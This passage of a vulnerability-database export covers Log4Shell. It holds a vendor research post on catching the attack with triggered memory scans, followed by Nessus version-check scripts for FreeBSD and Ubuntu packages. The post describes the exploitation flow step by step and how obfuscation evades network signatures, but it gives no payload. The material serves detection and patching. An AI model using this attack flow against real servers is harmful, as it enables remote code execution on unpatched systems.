network protocol to the target machine, for example a modified HTTP Header sent as part of a POST request.\n\nThis is the reason many defenders are now focusing their efforts on detecting the malicious strings through network traffic and recognizing that proactivity is critical to drive positive results. However, network signatures can be bypassed and there are reports confirming threat actors are adapting their network attacks with various forms of obfuscation to elude network scanning. The image below shows some of the current obfuscation techniques that have been observed or reported related to this attack.\n\n \nSource: <https://github.com/mcb2Eexe/Log4j2-Obfucation> \n \n\n\nNow, this doesn\u2019t mean that network protection solutions are not useful against this attack! In fact, Log4j is proving just how critical it is for defenders to be as adaptable as attackers and enter a new era of living security \u2013 embracing a more dynamic approach and mindset. Network security platforms provide a first layer of defense and should be used as part of an embedded security architecture (security risk treatment strategy), augmented by additional layers of protection, detection, visibility, and response. \n\nModern endpoint solutions are uniquely positioned to complement network-based capabilities with in-depth, host-based visibility of system processes, such as in-memory scanning and rapid response orchestration. This combination results in a robust defense against threats like Log4Shell and allows businesses to build back confidence via end-to-end security. \n\n##### \u2018I See You\u2019: Memory Scanning #FTW\n\nMemory scanning can provide further value and help network security platforms when a connection arrives to the endpoint after defeating the obfuscation layers. The diagram below shows the execution flow for a common web-based Log4j attack.\n\n \n \n\n\nLet\u2019s outline what happens:\n\n * **Step #1:** An attacker sends a specially-crafted string to the web server hosting the vulnerable application. This string, as we see, can be obfuscated to bypass network-based signatures.\n * **Step #2:** The application proceeds to de-obfuscate this string to load it in memory. Once loaded into memory, the application initiates a LDAP connection to request the address of where the malicious class file is located.\n * **Step #3:** The attacker-controlled LDAP server responds with the location of the malicious class file by indicating the HTTP URL address of where it is hosted.\n * **Step #4:** The vulnerable application will proceed to initiate a download of the malicious class file.\n * **Step #5:** The vulnerable application will load and run the malicious class file from Step #4. At this moment, the attacker achieves code execution on the target, leaving traces that may provide visibility on this activity for the defender. This can include spawning additional processes or touching files and registry keys after an exploitation. \n\nImagine if we could outsmart the obfuscation tactics? You absolutely can \u2013 and should \u2013 to get ahead of threats like Log4j. This can be accomplished by triggering a memory scan at some point in this execution flow to detect the presence of the malicious code file. We would have a high probability to find the de-obfuscated string used within the process memory at that time. If the memory is scanned after the malicious class file is downloaded, that content would also be available for scanning in its de-obfuscated form.\n\nSuch possibilities make the memory signature performant and efficient, given the timing of the detection mainly depends on the trigger used to start the memory scan.\n\n##### Endpoint Security Expert Rules meets Memory Scan\n\nOur solution allows organizations to do just that, delivering the ability to trigger a memory scan from an Expert Rule.\n\nExpert Rules are customizable access control rules that end-users employ to detect suspicious activity not commonly seen by other scanners. We also provides community Expert Rules mapped to the MITRE ATT&amp;CK Matrix through our public GitHub.\n\nThese capabilities let us target the applications vulnerable to Log4j and identify the moment they are being exploited. Consider the following rule:\n\n \n \n\n\nHere we see a section defining ACTORS (inside the Process {\u2026} section) and TARGETS (inside the Target {\u2026} section). ACTORS are any process that may be vulnerable to the Log4j exploit. In this case, we see JAVA.EXE for standalone Java applications and TOMCAT?.EXE for Apache web-based applications. Either of these processes need to load both JAVA.DLL and JVM.DLL to ensure the Java runtime is active.\n\nThe TARGET section includes any potential payload from the attack. As Expert Rules are not focused on network traffic, we need to focus on the last step of the execution flow, which is when the payload is executed. Additional triggers like files or registry keys accessed can be added as more information about exploits become available. We can also include any exclusion of valid behavior as shown in the example above using \u201cExclude\u201d as the command line parameter. This exclusion is something customers can tailor to their environment to avoid false positives, creating better efficiencies when combating threats. \n\nThis Expert Rule will trigger when any ACTOR process spawns any of the TARGET payloads. It is important to note how certain nuances can affect outcomes and false positives. Take a look at this line at the beginning of the rule:\n\n \n \n\n\nThis instruction initiates a memory scan against the ACTOR process which caused the Expert Rule to trigger. Now we have a reliable trigger for a performant memory scan, avoiding any performance issues that could arise from a blind memory scan. A bonus is that this scan is done at a time very close to the initial exploitation attempt, which guarantees the de-obfuscated string will be in memory.\n\nNext, we scan the memory of the process which triggered the Expert Rule, executed by the AV DAT Engine. Once this string is found, detection will occur on the affected process, and the action configured in the Expert Rule REACTION line will be applied. We recommend you use the REPORT action initially until you have sorted out what processes you need to monitor.\n\n \n \n\n\nThe first event highlighted above is the Expert Rule triggering for a suspicious process spawning from JAVA.EXE, and the second shows the AV DAT detection indicating the memory of that process had signatures of the exploit.\n\n##### Note:\n\nIf the Expert Rule detection was solely present and NOT the Java Naming and Directory Interface (JNDI)/Log4j-Exploit event, it would indicate a program has executed suspicious children processes, and customers are advised to review the event and improve the Expert Rule accordingly.\n\nHowever, if both the Expert Rule and JNDI/Log4j-Exploit events are triggered for the same program, we have confidently detected the presence of the process being exploited.\n\nWe provide more information about our current coverage for Log4j vulnerability in KB95901 \u2013 coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. This article contain links to download the Expert Rule and an added updated EXTRA.DAT, as well as details on how to set up ePO to use them in your environment.\n\nIf you\u2019d like to implement this solution, we encourage you to review the instructions in the KB and associated documentation. It is highly recommended to review the Expert Rule and customize it to your environment so you\u2019re not only thwarting or responding to active risks, but also dynamically adapting to safeguard against evolving threats. \n\n##### Conclusion\n\nTo protect an environment against attacks like Log4j, a layered, embedded strategy comprised of network security coupled with targeted endpoint memory scans allows defenders to effectively detect and prevent the attack execution flow against vulnerable systems exposed via network vectors. Our ENS Expert Rules and Custom Scan reactions are designed to enable you with such capabilities so you can apply precise countermeasures against these emerging threats and gain the upper hand and more confidence to maintain and grow your business. \n", "cvss3": {}, "published": "2022-01-19T00:00:00", "type": "trellix", "title": "Log4J and The Memory That Knew Too Much", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T00:00:00", "id": "TRELLIX:908157CFA8050AA23921170E873187E1", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/log4j-and-the-memory-that-knew-too-much.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-11-07T16:49:05", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://github.com/Graylog2/graylog2-server/commit/d3e441f1126f0dc292e986879039a87c59375b2a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0936599f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://logging.apache.org/log4j/2.x/security.html\");\n # https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90d622ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:graylog\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'graylog<4.2.3'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:50:06", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:opensearch", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "href": "https://www.tenable.com/plugins/nessus/156026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156026);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://opensearch.org/blog/releases/2021/12/update-to-1-2-1/\");\n # https://vuxml.freebsd.org/freebsd/4b1ac5a3-5bd4-11ec-8602-589cfc007716.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?036fbe2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opensearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'opensearch<1.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:40", "description": "A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:horizon"], "id": "VMWARE_HORIZON_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156560", "sourceData": "Binary data vmware_horizon_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:07:36", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:21:42", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:esm", "p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java"], "id": "UBUNTU_USN-5192-2.NASL", "href": "https://www.tenable.com/plugins/nessus/156161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5192-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156161);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"USN\", value:\"5192-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0597\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5192-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:esm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = 